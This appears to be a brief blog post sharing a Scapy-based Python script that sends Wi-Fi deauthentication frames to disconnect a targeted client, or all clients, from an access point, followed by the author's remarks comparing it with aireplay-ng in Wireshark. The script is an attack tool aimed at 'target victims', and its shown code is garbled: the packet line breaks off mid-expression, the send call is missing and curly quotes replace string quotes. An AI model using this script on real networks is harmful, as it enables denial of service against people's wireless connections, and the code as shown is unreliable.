De-Auth packet from Scapy

This script is fromĀ Adam Maxwell (@catalyst256)

#!/usr/bin/env python
# Scapy based wifi Deauth by @catalyst256
# Change the client to FF:FF:FF:FF:FF:FF if you want a broadcasted deauth to all stations on the targeted Access Point

import sys
if len(sys.argv) != 5:
print ‘Usage is ./ interface bssid client count’
print ‘Example – ./ mon0 00:11:22:33:44:55 55:44:33:22:11:00 50’

from scapy.all import *

conf.iface = sys.argv[1] # The interface that you want to send packets out of, needs to be set to monitor mode
bssid = sys.argv[2] # The BSSID of the Wireless Access Point you want to target
client = sys.argv[3] # The MAC address of the Client you want to kick off the Access Point
count = sys.argv[4] # The number of deauth packets you want to send

conf.verb = 0

packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client,

for n in range(int(count)):
print ‘Deauth sent via: ‘ + conf.iface + ‘ to BSSID: ‘ + bssid + ‘ for Client: ‘ + client

This script will send De-Auth packet to the target victims.

I did run the Wireshark when the attacks are running, and the result is the same as attacks from the airplay-ng as in my previous post. But it’s more precise where the value of the packet send is same as receive to the victim. If you set it as “1” so the packet send to the victim also only “1” packet.

This article was written by matn0t.